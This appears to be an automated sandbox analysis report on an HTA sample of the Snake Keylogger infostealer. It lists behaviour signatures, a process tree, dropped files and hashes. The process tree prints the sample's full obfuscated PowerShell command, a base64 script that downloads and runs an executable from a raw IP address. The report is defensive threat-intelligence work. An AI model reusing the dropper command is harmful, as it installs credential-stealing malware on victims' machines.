Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-09-2024 01:09

General

  • Target

    1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta

  • Size

    115KB

  • MD5

    17116a0f43508549998ef6618154d77a

  • SHA1

    e71af8b0489263e476521a5fd6e22e5511369c4d

  • SHA256

    1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64

  • SHA512

    a6824f19100e0fd4c996ab8db64875fb1c0c0e4d045792793b45ad1e93cb358c6746289209d8d1f4634c6ebed9ade9e43a5b3407856780e7e60954efc249e9d9

  • SSDEEP

    96:Ea+M7wmf6PCZ60NUrnPmeobQk9B6/A6I6L1j+Z668AT:Ea+Qwmf6PCZ6kUTWfz6Y6dKZ6+T

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2496
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xlbizkac.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F1E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9F1D.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3016
        • C:\Users\Admin\AppData\Roaming\dllhost.exe
          "C:\Users\Admin\AppData\Roaming\dllhost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2156
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\dllhost.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:1140
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 400
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:1484

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES9F1E.tmp

    Filesize

    1KB

    MD5

    483f1fa29fdeb4eae97e9b4f1f449883

    SHA1

    afb4adf44f7d25ecfd41192b5420526a1c789321

    SHA256

    bb82c0394328066214d4057e16b5458473a41df52f51953a89703dfa40ed8dbe

    SHA512

    99eaf615008bcc69a3269e804817792ceb1cdd0431ce4c30612c70280271189b9e428c91ec097e3bba78677277f816c9a9580f01a0cbe5a2956598ed7b81b357

  • C:\Users\Admin\AppData\Local\Temp\xlbizkac.dll

    Filesize

    3KB

    MD5

    e9334e9d5212e2c349546f5e3388646a

    SHA1

    3fa6d0ec6de41e5bed82ea6378c07834b5c96b28

    SHA256

    272d6fa0c331f3b9a51103a75a026054efe86e1e274a471d9e17fbbe808c20d0

    SHA512

    f7648b844214b071603569a88f5b0e8659c62d737c1f16d31b3917f105dcc43683f6857f738faf2204958082fe0d060105b6a62f84ba574c023e798deb3b6999

  • C:\Users\Admin\AppData\Local\Temp\xlbizkac.pdb

    Filesize

    7KB

    MD5

    b3ba42df397e89bbc97868e1476eedac

    SHA1

    ecc7ee8213cdf11bd80b5fd5d8f239e67ec44f96

    SHA256

    20ffec703934b2f3fe57fd3d9da5afadc1adcfeb2a42186542a2b8cda2071f53

    SHA512

    6d4fa41d473222ddf560ce43db2e45a4afb9ff789ce14d6e25161c597d434804ef356e1c10295bef3aa63b240f4bce7e96df33c9d234e914e8035da3c7147b70

  • C:\Users\Admin\AppData\Roaming\dllhost.exe

    Filesize

    956KB

    MD5

    249f4ca7f1cc801c87cebd0cdf0b398e

    SHA1

    1241f91fa9239ed0553c33f6d3651644813f6f84

    SHA256

    b639e9680b5ac670c7b58863479c1cf9c7bea436aee481fa9729c6a82508e556

    SHA512

    0b6ae1f507b5599f9fb651576e12ae378b66111193623d806f0e6266e8ee93f1fa5dedd4d4b96f3360fecc81962b76e9bacc7c1096a96df5b33fbd64aa6a18d6

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC9F1D.tmp

    Filesize

    652B

    MD5

    fdc1fe7eed84734db9109aa4743725fe

    SHA1

    f83a01a593e552a168b18b00940a2e7b2770d476

    SHA256

    a3819491d2298b83ec060e10f157e2cc38ac53a2e8163cd2259779a982112b41

    SHA512

    b8c5973acd33a013149854376e875f410b44e0304016adfe0ca72d0a0650ec4e751e3ba3a4a3aa94141c6ee6304ffa840546da941e94e2f17a71470d15d6e184

  • \??\c:\Users\Admin\AppData\Local\Temp\xlbizkac.0.cs

    Filesize

    475B

    MD5

    74ac079a164eedfd18ee0237dead2da7

    SHA1

    62575f712ded8ea2637ee5e5eda8ae9cf2919dc1

    SHA256

    6c72d2a89a0a1d35a067d9322c4c94503d5a75a2e6308cbf9b7bc95e9396f615

    SHA512

    7994aaef91f02e10fd65e782063492a1658e9b1e6e6ffa3a54fce1ab14b39c19bbd3b61cea46908f87cfde0466ef53e3be352c003db797bef0c9f67875285dbb

  • \??\c:\Users\Admin\AppData\Local\Temp\xlbizkac.cmdline

    Filesize

    309B

    MD5

    495f86e1756d25209bc8bb8e2f2a9011

    SHA1

    d2c2ab0903e7b8764dce724857ab2130393f5860

    SHA256

    c7f120e52484ff231ae0c99a9cbbd7ced041adfef791a2d05d0bf42f32e93c79

    SHA512

    c5345e555516de2bd059295f97e1f7d17a1c87cf7e142157805abb6cfc1e44d365c39bb15d1b51c3a065de600ba1fb532190f20ce0c4dbb847917f5ea5e60ccd

  • memory/1140-29-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1140-30-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1140-31-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB